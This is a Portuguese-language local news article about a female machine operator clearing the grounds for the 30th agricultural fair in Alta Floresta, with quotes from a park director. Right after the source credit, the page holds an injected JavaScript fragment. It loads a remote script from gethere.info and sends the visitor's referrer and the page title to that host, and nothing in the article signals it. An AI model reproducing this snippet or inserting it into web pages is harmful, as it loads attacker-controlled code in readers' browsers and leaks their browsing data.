Capa / Em Destaque / Mulher no volante, certeza de trabalho constante

Mulher no volante, certeza de trabalho constante

Não é comum ver uma mulher pilotando um equipamento pesado, como uma patrol, e quando isso acontece, invariavelmente acaba virando uma espécie de “atração”. Está sendo assim com a operadora de máquinas Josi, que está trabalhando na limpeza do parque de exposições, ajudando a preparar o espaço para a 30ª Feira Agropecuária de Alta Floresta. A reportagem do O Diário esteve no sábado acompanhando a limpeza do parque e testemunhou que os trabalhos seguem em ritmo acelerado. A feira acontecerá de 24 à 29 deste mês.

Segundo o agricultor Chico Gamba, que é um dos diretores do parque, pelo ritmo acelerado dos trabalhos é garantido que o parque esteja em plenas condições para começar a receber os expositores para a montagem de seus espaços já a partir desta semana. Ele também elogiou a destreza de Josi operando o equipamento afirmando que ela é uma excelente profissional. “Estamos tendo este privilegio, e incentivando outras mulheres para que entre neste mercado porque é possível, é uma coisa para nós até interessante. Recentemente eu carreguei também uns caminhões de soja e veio uma mulher na boleia, uma excelente motorista e eu hoje vejo uma excelente profissional trabalhando dentro do parque aqui, uma loira operando uma máquina e deixando o pessoal de queixo caído com o profissionalismo dela”, atestou Gamba.
Quanto aos trabalhos no parque, como a estrutura física está praticamente toda resolvida, este ano só haverá limpeza e um ou outro reparo, principalmente no estacionamento. O diretor do Sindicato Rural fez questão de enaltecer o apoio que a festa esta recebendo do poder público. “Já no início da semana mandou um pessoal pra roçada, tanto com trator quanto manual e há dois dias o maquinário veio fazendo a recuperação das estradas para dar acesso ao Parque de exposições e hoje está fazendo limpeza na beira das estradas com as máquinas também dando continuidade neste trabalho de patrolamento”, afirmou para em seguida garanti. “Com certeza será uma grande festa mais uma vez”.

Fonte: Altair Nerys.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top